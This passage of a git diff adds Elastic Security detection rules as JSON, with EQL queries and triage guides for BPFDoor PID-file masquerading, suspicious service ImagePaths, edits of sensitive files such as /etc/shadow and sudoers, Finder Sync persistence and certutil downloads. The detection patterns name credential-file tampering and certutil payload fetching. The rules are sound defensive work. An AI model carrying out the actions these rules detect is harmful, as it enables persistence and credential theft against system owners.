that spawn processes." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Process Started from Process ID (PID) File", + "note": "## Triage and analysis\n\n### Investigating Process Started from Process ID (PID) File\nDetection alerts from this rule indicate a process spawned from an executable masqueraded as a legitimate PID file which is very unusual and should not occur. Here are some possible avenues of investigation:\n- Examine parent and child process relationships of the new process to determine if other processes are running.\n- Examine the /var/run directory using Osquery to determine other potential PID files with unsually large file sizes, indicative of it being an executable: \"SELECT f.size, f.uid, f.type, f.path from file f WHERE path like '/var/run/%%';\"\n- Examine the reputation of the SHA256 hash from the PID file in a database like VirusTotal to identify additional pivots and artifacts for investigation.\n", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and user.id == \"0\" and\n process.executable regex~ \"\"\"/var/run/\\w+\\.(pid|lock|reboot)\"\"\"\n", + "references": [ + "https://www.sandflysecurity.com/blog/linux-file-masquerading-and-malicious-pids-sandfly-1-2-6-update/", + "https://twitter.com/GossiTheDog/status/1522964028284411907", + "https://exatrack.com/public/Tricephalic_Hellkeeper.pdf", + "https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "3688577a-d196-11ec-90b0-f661ea17fbce", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Threat: BPFDoor", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "3688577a-d196-11ec-90b0-f661ea17fbce_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/36a8e048-d888-4f61-a8b9-0f9e2e40f317_106.json b/packages/security_detection_engine/kibana/security_rule/36a8e048-d888-4f61-a8b9-0f9e2e40f317_106.json new file mode 100644 index 00000000000..14f9a06ff83 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/36a8e048-d888-4f61-a8b9-0f9e2e40f317_106.json @@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation of a suspicious ImagePath value. This could be an indication of an adversary attempting to stealthily persist or escalate privileges through abnormal service creation.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious ImagePath Service Creation", + "query": "registry where host.os.type == \"windows\" and registry.path : (\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Services\\\\*\\\\ImagePath\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\ControlSet*\\\\Services\\\\*\\\\ImagePath\"\n ) and\n /* add suspicious registry ImagePath values here */\n registry.data.strings : (\"%COMSPEC%*\", \"*\\\\.\\\\pipe\\\\*\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "36a8e048-d888-4f61-a8b9-0f9e2e40f317", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.003", + "name": "Windows Service", + "reference": "https://attack.mitre.org/techniques/T1543/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 106 + }, + "id": "36a8e048-d888-4f61-a8b9-0f9e2e40f317_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/36a8e048-d888-4f61-a8b9-0f9e2e40f317_107.json b/packages/security_detection_engine/kibana/security_rule/36a8e048-d888-4f61-a8b9-0f9e2e40f317_107.json new file mode 100644 index 00000000000..cc32c27c6d7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/36a8e048-d888-4f61-a8b9-0f9e2e40f317_107.json @@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation of a suspicious ImagePath value. This could be an indication of an adversary attempting to stealthily persist or escalate privileges through abnormal service creation.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.registry-*", + "endgame-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious ImagePath Service Creation", + "query": "registry where host.os.type == \"windows\" and registry.path : (\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Services\\\\*\\\\ImagePath\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\ControlSet*\\\\Services\\\\*\\\\ImagePath\"\n ) and\n /* add suspicious registry ImagePath values here */\n registry.data.strings : (\"%COMSPEC%*\", \"*\\\\.\\\\pipe\\\\*\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "36a8e048-d888-4f61-a8b9-0f9e2e40f317", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.003", + "name": "Windows Service", + "reference": "https://attack.mitre.org/techniques/T1543/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "36a8e048-d888-4f61-a8b9-0f9e2e40f317_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/36c48a0c-c63a-4cbc-aee1-8cac87db31a9_3.json b/packages/security_detection_engine/kibana/security_rule/36c48a0c-c63a-4cbc-aee1-8cac87db31a9_3.json new file mode 100644 index 00000000000..22883c5d7d7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/36c48a0c-c63a-4cbc-aee1-8cac87db31a9_3.json @@ -0,0 +1,61 @@ +{ + "attributes": { + "anomaly_threshold": 70, + "author": [ + "Elastic" + ], + "description": "A machine learning job has detected unusually high number of process arguments in an RDP session. Executing sophisticated attacks such as lateral movement can involve the use of complex commands, obfuscation mechanisms, redirection and piping, which in turn increases the number of arguments in a command.", + "from": "now-12h", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "lmd_high_mean_rdp_process_args", + "name": "High Mean of Process Arguments in an RDP Session", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/lmd", + "https://www.elastic.co/blog/detecting-lateral-movement-activity-a-new-kibana-integration", + "https://www.elastic.co/blog/remote-desktop-protocol-connections-elastic-security" + ], + "related_integrations": [ + { + "package": "lmd", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "risk_score": 21, + "rule_id": "36c48a0c-c63a-4cbc-aee1-8cac87db31a9", + "setup": "## Setup\n\nThe rule requires the Lateral Movement Detection integration assets to be installed, as well as file and Windows RDP process events collected by the Elastic Defend integration. \n\n### Lateral Movement Detection Setup\nThe Lateral Movement Detection integration detects lateral movement activity by identifying abnormalities in file and Windows RDP events. Anomalies are detected using Elastic's Anomaly Detection feature.\n\n#### Prerequisite Requirements:\n- Fleet is required for Lateral Movement Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- Windows RDP process events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) integration.\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n#### The following steps should be executed to install assets associated with the Lateral Movement Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Lateral Movement Detection and select the integration to see more details about it.\n- Under Settings, click Install Lateral Movement Detection assets and follow the prompts to install the assets.\n\n#### Anomaly Detection Setup\nBefore you can enable rules for Lateral Movement Detection, you'll need to enable the corresponding Anomaly Detection jobs.\n- Before enabling the Anomaly Detection jobs, confirm that the Pivot Transform asset is installed and actively gathering data in the destination index `ml-rdp-lmd`.\n- Go to the Kibana homepage. Under Analytics, click Machine Learning.\n- Under Anomaly Detection, click Jobs, and then click \"Create job\". Select the Data View containing your transformed RDP process data i.e.`ml-rdp-lmd`.\n- If the selected Data View contains events that match the query in [this](https://github.com/elastic/integrations/blob/main/packages/lmd/kibana/ml_module/lmd-ml.json) configuration file, you will see a card for Lateral Movement Detection under \"Use preconfigured jobs\".\n- Keep the default settings and click \"Create jobs\" to start the anomaly detection jobs and datafeeds.\n", + "severity": "low", + "tags": [ + "Use Case: Lateral Movement Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Lateral Movement" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1210", + "name": "Exploitation of Remote Services", + "reference": "https://attack.mitre.org/techniques/T1210/" + } + ] + } + ], + "type": "machine_learning", + "version": 3 + }, + "id": "36c48a0c-c63a-4cbc-aee1-8cac87db31a9_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3728c08d-9b70-456b-b6b8-007c7d246128_4.json b/packages/security_detection_engine/kibana/security_rule/3728c08d-9b70-456b-b6b8-007c7d246128_4.json new file mode 100644 index 00000000000..b2cc0f01bdc --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3728c08d-9b70-456b-b6b8-007c7d246128_4.json @@ -0,0 +1,128 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for the potential edit of a suspicious file. In Linux, when editing a file through an editor, a temporary .swp file is created. By monitoring for the creation of this .swp file, we can detect potential file edits of suspicious files. The execution of this rule is not a clear sign of the file being edited, as just opening the file through an editor will trigger this event. Attackers may alter any of the files added in this rule to establish persistence, escalate privileges or perform reconnaisance on the system.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "max_signals": 1, + "name": "Potential Suspicious File Edit", + "query": "file where event.action in (\"creation\", \"file_create_event\") and file.extension == \"swp\" and \nfile.path : (\n /* common interesting files and locations */\n \"/etc/.shadow.swp\", \"/etc/.shadow-.swp\", \"/etc/.shadow~.swp\", \"/etc/.gshadow.swp\", \"/etc/.gshadow-.swp\",\n \"/etc/.passwd.swp\", \"/etc/.pwd.db.swp\", \"/etc/.master.passwd.swp\", \"/etc/.spwd.db.swp\", \"/etc/security/.opasswd.swp\",\n \"/etc/.environment.swp\", \"/etc/.profile.swp\", \"/etc/sudoers.d/.*.swp\", \"/etc/ld.so.conf.d/.*.swp\",\n \"/etc/init.d/.*.swp\", \"/etc/.rc.local.swp\", \"/etc/rc*.d/.*.swp\", \"/dev/shm/.*.swp\", \"/etc/update-motd.d/.*.swp\",\n \"/usr/lib/update-notifier/.*.swp\",\n\n /* service, timer, want, socket and lock files */\n \"/etc/systemd/system/.*.swp\", \"/usr/local/lib/systemd/system/.*.swp\", \"/lib/systemd/system/.*.swp\",\n \"/usr/lib/systemd/system/.*.swp\",\"/home/*/.config/systemd/user/.*.swp\", \"/run/.*.swp\", \"/var/run/.*.swp/\",\n\n /* profile and shell configuration files */ \n \"/home/*.profile.swp\", \"/home/*.bash_profile.swp\", \"/home/*.bash_login.swp\", \"/home/*.bashrc.swp\", \"/home/*.bash_logout.swp\",\n \"/home/*.zshrc.swp\", \"/home/*.zlogin.swp\", \"/home/*.tcshrc.swp\", \"/home/*.kshrc.swp\", \"/home/*.config.fish.swp\",\n \"/root/*.profile.swp\", \"/root/*.bash_profile.swp\", \"/root/*.bash_login.swp\", \"/root/*.bashrc.swp\", \"/root/*.bash_logout.swp\",\n \"/root/*.zshrc.swp\", \"/root/*.zlogin.swp\", \"/root/*.tcshrc.swp\", \"/root/*.kshrc.swp\", \"/root/*.config.fish.swp\"\n)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "3728c08d-9b70-456b-b6b8-007c7d246128", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1037", + "name": "Boot or Logon Initialization Scripts", + "reference": "https://attack.mitre.org/techniques/T1037/", + "subtechnique": [ + { + "id": "T1037.004", + "name": "RC Scripts", + "reference": "https://attack.mitre.org/techniques/T1037/004/" + } + ] + }, + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.006", + "name": "Dynamic Linker Hijacking", + "reference": "https://attack.mitre.org/techniques/T1574/006/" + } + ] + }, + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.002", + "name": "Systemd Service", + "reference": "https://attack.mitre.org/techniques/T1543/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.003", + "name": "Sudo and Sudo Caching", + "reference": "https://attack.mitre.org/techniques/T1548/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 4 + }, + "id": "3728c08d-9b70-456b-b6b8-007c7d246128_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/37f638ea-909d-4f94-9248-edd21e4a9906_106.json b/packages/security_detection_engine/kibana/security_rule/37f638ea-909d-4f94-9248-edd21e4a9906_106.json new file mode 100644 index 00000000000..86f8dbbea69 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/37f638ea-909d-4f94-9248-edd21e4a9906_106.json @@ -0,0 +1,88 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Finder Sync plugins enable users to extend Finder\u2019s functionality by modifying the user interface. Adversaries may abuse this feature by adding a rogue Finder Plugin to repeatedly execute malicious payloads for persistence.", + "false_positives": [ + "Trusted Finder Sync Plugins" + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Finder Sync Plugin Registered and Enabled", + "query": "process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\") and process.name : \"pluginkit\" and\n process.args : \"-e\" and process.args : \"use\" and process.args : \"-i\" and\n not process.args :\n (\n \"com.google.GoogleDrive.FinderSyncAPIExtension\",\n \"com.google.drivefs.findersync\",\n \"com.boxcryptor.osx.Rednif\",\n \"com.adobe.accmac.ACCFinderSync\",\n \"com.microsoft.OneDrive.FinderSync\",\n \"com.insynchq.Insync.Insync-Finder-Integration\",\n \"com.box.desktop.findersyncext\"\n ) and\n not process.parent.executable : (\n \"/Library/Application Support/IDriveforMac/IDriveHelperTools/FinderPluginApp.app/Contents/MacOS/FinderPluginApp\"\n )\n", + "references": [ + "https://github.com/specterops/presentations/raw/master/Leo%20Pitt/Hey_Im_Still_in_Here_Modern_macOS_Persistence_SO-CON2020.pdf" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "37f638ea-909d-4f94-9248-edd21e4a9906", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 106 + }, + "id": "37f638ea-909d-4f94-9248-edd21e4a9906_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3838e0e3-1850-4850-a411-2e8c5ba40ba8_110.json b/packages/security_detection_engine/kibana/security_rule/3838e0e3-1850-4850-a411-2e8c5ba40ba8_110.json new file mode 100644 index 00000000000..81433f6247a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3838e0e3-1850-4850-a411-2e8c5ba40ba8_110.json @@ -0,0 +1,85 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies certutil.exe making a network connection. Adversaries could abuse certutil.exe to download a certificate, or malware, from a remote URL.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Network Connection via Certutil", + "note": "## Triage and analysis\n\n### Investigating Network Connection via Certutil\n\nAttackers can abuse `certutil.exe` to download malware, offensive security tools, and certificates from external sources in order to take the next steps in a compromised environment.\n\nThis rule looks for network events where `certutil.exe` contacts IP ranges other than the ones specified in [IANA IPv4 Special-Purpose Address Registry](https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml)\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses the [Investigate Markdown Plugin](https://www.elastic.co/guide/en/security/master/interactive-investigation-guides.html) introduced in Elastic Stack version 8.8.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - !{investigate{\"label\":\"Alerts associated with the user in the last 48h\",\"providers\":[[{\"excluded\":false,\"field\":\"event.kind\",\"queryType\":\"phrase\",\"value\":\"signal\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"user.id\",\"queryType\":\"phrase\",\"value\":\"{{user.id}}\",\"valueType\":\"string\"}]],\"relativeFrom\":\"now-48h/h\",\"relativeTo\":\"now\"}}\n - !{investigate{\"label\":\"Alerts associated with the host in the last 48h\",\"providers\":[[{\"excluded\":false,\"field\":\"event.kind\",\"queryType\":\"phrase\",\"value\":\"signal\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"host.name\",\"queryType\":\"phrase\",\"value\":\"{{host.name}}\",\"valueType\":\"string\"}]],\"relativeFrom\":\"now-48h/h\",\"relativeTo\":\"now\"}}\n- Investigate if the downloaded file was executed.\n- Determine the context in which `certutil.exe` and the file were run.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the downloaded file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - !{investigate{\"label\":\"Investigate the Subject Process Network Events\",\"providers\":[[{\"excluded\":false,\"field\":\"process.entity_id\",\"queryType\":\"phrase\",\"value\":\"{{process.entity_id}}\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"event.category\",\"queryType\":\"phrase\",\"value\":\"network\",\"valueType\":\"string\"}]]}}\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. If trusted software uses this command and the triage has not identified anything suspicious, this alert can be closed as a false positive.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "network where host.os.type == \"windows\" and process.name : \"certutil.exe\" and\n not cidrmatch(destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\",\n \"192.0.0.0/29\", \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\",\n \"192.0.0.171/32\", \"192.0.2.0/24\", \"192.31.196.0/24\", \"192.52.193.0/24\",\n \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\", \"100.64.0.0/10\", \"192.175.48.0/24\",\n \"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\",\n \"FE80::/10\", \"FF00::/8\")\n", + "references": [ + "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml", + "https://frsecure.com/malware-incident-response-playbook/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "3838e0e3-1850-4850-a411-2e8c5ba40ba8", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + 